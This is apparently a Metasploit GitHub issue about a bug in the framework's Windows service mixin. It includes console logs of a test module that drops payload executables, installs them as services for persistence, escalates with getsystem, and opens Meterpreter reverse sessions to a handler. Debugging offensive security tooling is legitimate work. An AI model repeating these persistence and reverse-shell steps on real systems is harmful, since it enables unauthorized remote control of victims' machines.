Service Mixin Permissions Inconsistencies #20657
Description
While testing #20638 I noticed an inconsistency in permissions required (or possibly other bug) when using the service mixin vs powershell and sc.exe.
I wrote a test script to outline the issue: https://gist.github.com/h00die/e7b8e7c43eaf9c68bba35bc28adb2fa1
Test run against Windows 10 with meterp via webdelivery in an admin privileged powershell window.
Run as admin:
msf exploit(windows/persistence/service_tester) > [*] is_admin?: true
[*] is_system?: false
[*] ================================
[*] powershell method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\CdaNm.exe
[*] Creating service xCFNwXabNgF
[*] Installing service
[*] Install service:
Status Name DisplayName
------ ---- -----------
Stopped xCFNwXabNgF hgfnjSNp
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
[*] Meterpreter session 12 opened (2.2.2.2:4444 -> 1.1.1.1:50298) at 2025-10-22 19:49:09 -0400
[*] ================================
[*] sc.exe method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\JEfRC.exe
[*] Creating service eoKFDDGy
[*] Install service: [SC] CreateService SUCCESS
[*] Set Description: [SC] ChangeServiceConfig2 SUCCESS
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
SERVICE_NAME: eoKFDDGy
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 6668
FLAGS :
[*] Meterpreter session 13 opened (2.2.2.2:4444 -> 1.1.1.1:50299) at 2025-10-22 19:49:15 -0400
[*] ================================
[*] lib/mixin method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\XaPCPtyx.exe
[*] Creating service FbBAOBlzbgXi
[*] Install service: 6
[-] Exploit failed: RuntimeError Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
- So we see that using powershell commands, we get a valid running service.
sc.exe, we get a valid running service.- mixin we get
6as the return (it wasn't created), and when trying to run the non-existant server, we get an error message.
Run as system:
msf exploit(windows/persistence/service_tester) > sessions -i 11
[*] Starting interaction with 11...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 11...
msf exploit(windows/persistence/service_tester) > rexploit
[*] Reloading module...
[*] Exploit running as background job 6.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(windows/persistence/service_tester) > [*] is_admin?: true
[*] is_system?: true
[*] ================================
[*] powershell method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\uXDCbywa.exe
[*] Creating service MFrORYjIgdVX
[*] Installing service
[*] Install service:
Status Name DisplayName
------ ---- -----------
Stopped MFrORYjIgdVX zFwEhpI
[*] Start service:
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter session 14 opened (2.2.2.2:4444 -> 1.1.1.1:50300) at 2025-10-22 19:52:20 -0400
[*] ================================
[*] sc.exe method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\dTdDW.exe
[*] Creating service IeLFnJiue
[*] Install service: [SC] CreateService SUCCESS
[*] Set Description: [SC] ChangeServiceConfig2 SUCCESS
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
SERVICE_NAME: IeLFnJiue
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 9932
FLAGS :
[*] Meterpreter session 15 opened (2.2.2.2:4444 -> 1.1.1.1:50301) at 2025-10-22 19:52:26 -0400
[*] ================================
[*] lib/mixin method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\EesEekmA.exe
[*] Creating service VONMCEdA
[*] Install service: 6
[-] Exploit failed: RuntimeError Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
Same results.
Test run against Windows 10 with meterp via psexec.
msf exploit(windows/persistence/service_tester) > [*] is_admin?: true
[*] is_system?: true
[*] ================================
[*] powershell method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\mLjvNPkF.exe
[*] Creating service lxsLfQlLH
[*] Installing service
[*] Install service:
Status Name DisplayName
------ ---- -----------
Stopped lxsLfQlLH ebrb
[*] Start service:
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter session 17 opened (2.2.2.2:4444 -> 1.1.1.1:50304) at 2025-10-22 19:54:54 -0400
[*] ================================
[*] sc.exe method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\JxOszqjA.exe
[*] Creating service fUJNSAWF
[*] Install service: [SC] CreateService SUCCESS
[*] Set Description: [SC] ChangeServiceConfig2 SUCCESS
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Start service:
SERVICE_NAME: fUJNSAWF
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 9748
FLAGS :
[*] Meterpreter session 18 opened (2.2.2.2:4444 -> 1.1.1.1:50305) at 2025-10-22 19:55:00 -0400
[*] ================================
[*] lib/mixin method
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\fbsXNX.exe
[*] Creating service sjPslLkqMhz
[*] Install service: 6
[-] Exploit failed: RuntimeError Could not open service. OpenServiceA error: FormatMessage failed to retrieve the error.
# Other Notes
Don't rule out user error.